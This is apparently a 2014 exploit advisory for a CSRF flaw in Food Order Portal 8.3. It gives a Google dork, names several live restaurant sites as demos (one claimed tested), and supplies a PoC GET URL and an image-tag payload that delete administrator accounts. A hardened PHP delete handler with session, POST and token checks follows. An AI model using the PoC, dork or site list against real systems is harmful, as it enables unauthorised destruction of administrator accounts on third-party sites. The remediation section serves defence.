Thursday, 11 September 2014

Food Order Portal 8.3 - (CSRF) Remote Admin Delete PoC


~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact (e-mail only) : knockout@e-mail.com.tr
[~] HomePage : http://Cyber-Warrior.Org - http://h4x0resec.blogspot.com
############################################################
                 Turkey Security Group
                 'h4x0re SECURITY'                      
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Food Order Portal
|~Affected Version : 8.3
|~Official Web and references : http://www.tourismscripts.com/scripts/scripts/food-order-portal-multi-restaurant-lingual-php-script.html
|~RISK : Medium
|~Google Keyword/Dork : inurl:login_restaurant.php        (example)
|~Tested On : Kali Linux \ Tested Browser: Mozilla Firefox \ Arora
####################INFO################################
The admin_user_delete.php action is triggered by a plain GET request with no anti-CSRF token, so an attacker who has no admin session of their own can delete an administrator account by getting a logged-in administrator to load the URL below.
########################################################
########################################################
Demos ;
http://click4foods.co.uk       <=== Tested; the admin panel was checked and the CSRF confirmed.
                                                     (Listed as a reference on the vendor's official site.)

http://www.saveonmeals.com
http://pizzatakeway.it/
http://myfood24.it/
http://www.foodrunner.ru/
..
..
=============================================================
                        CSRF PoC:
http://[VICTIM]/admin/admin_user_delete.php?admin_id=[ADMIN ID]   (default IDs: 1, 2)
                       Result: the administrator with that ID is deleted.
The request is a plain GET carrying no anti-CSRF token, so it fires as soon as a logged-in administrator's browser loads the URL, for example from an image tag or hidden iframe on an attacker-controlled page.
=============================================================
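The following is an added example, not code from Food Order Portal (whose source is not reproduced on this page). It shows, in a comment, the hypothetical GET-driven delete pattern that makes the PoC URL above work, followed by a hardened replacement for admin_user_delete.php that requires an authenticated admin session, a POST request and a per-session synchronizer token checked with a constant-time comparison. The table name `admin_users`, the session keys `admin_logged_in` and `admin_id`, the form field `csrf_token` and the mysqli handle `$conn` from an assumed `config.php` are all assumptions for illustration.

```php
<?php
// Added example: hardened replacement for a GET-driven admin delete handler.
// NOT Food Order Portal's code; table name, session keys and $conn are assumptions.
//
// Vulnerable pattern (hypothetical reconstruction of what the PoC URL implies):
//     $id = $_GET['admin_id'];
//     mysqli_query($conn, "DELETE FROM admin_users WHERE admin_id = $id");
// Any GET fires it, so an attacker page containing
//     <img src="http://victim/admin/admin_user_delete.php?admin_id=1">
// deletes the account the moment a logged-in administrator views that page.

session_start();
require 'config.php'; // assumed to open the mysqli connection $conn

// Issue one synchronizer token per session; call this when rendering the admin UI.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Compare the submitted token with the session token in constant time.
function csrf_token_valid(?string $submitted): bool
{
    if (!is_string($submitted) || empty($_SESSION['csrf_token'])) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

// 1. Only an authenticated administrator may reach the delete action at all.
if (empty($_SESSION['admin_logged_in'])) {
    http_response_code(403);
    exit('Not authenticated');
}

// 2. State changes only over POST: a bare GET from an <img> or a link does nothing.
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    http_response_code(405);
    header('Allow: POST');
    exit('Method not allowed');
}

// 3. A cross-site form cannot read the session token, so a mismatch means forgery.
if (!csrf_token_valid($_POST['csrf_token'] ?? null)) {
    http_response_code(403);
    exit('Invalid CSRF token');
}

// 4. Validate the ID and bind it in a prepared statement instead of concatenating it.
$adminId = filter_input(INPUT_POST, 'admin_id', FILTER_VALIDATE_INT,
    ['options' => ['min_range' => 1]]);
if ($adminId === false || $adminId === null) {
    http_response_code(400);
    exit('Bad admin_id');
}
// Refuse to delete the account performing the request.
if ($adminId === (int) ($_SESSION['admin_id'] ?? 0)) {
    http_response_code(400);
    exit('Cannot delete the current account');
}

$stmt = $conn->prepare('DELETE FROM admin_users WHERE admin_id = ?');
$stmt->bind_param('i', $adminId);
$stmt->execute();
$stmt->close();

header('Location: admin_users.php');
exit;

// The delete control in the admin user list must then be a POST form carrying the
// token, e.g.:
//   <form method="post" action="admin_user_delete.php">
//     <input type="hidden" name="csrf_token" value="{token}">
//     <input type="hidden" name="admin_id" value="2">
//     <button type="submit">Delete</button>
//   </form>
// where {token} is the output of htmlspecialchars(csrf_token()).
```

Checks 1 to 3 each stop the PoC on their own: the session check blocks an unauthenticated visitor, the method check defeats image-tag and link delivery, and the token check defeats an auto-submitting cross-site form. Keeping all three costs nothing and means the delete survives if one of them is later weakened.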
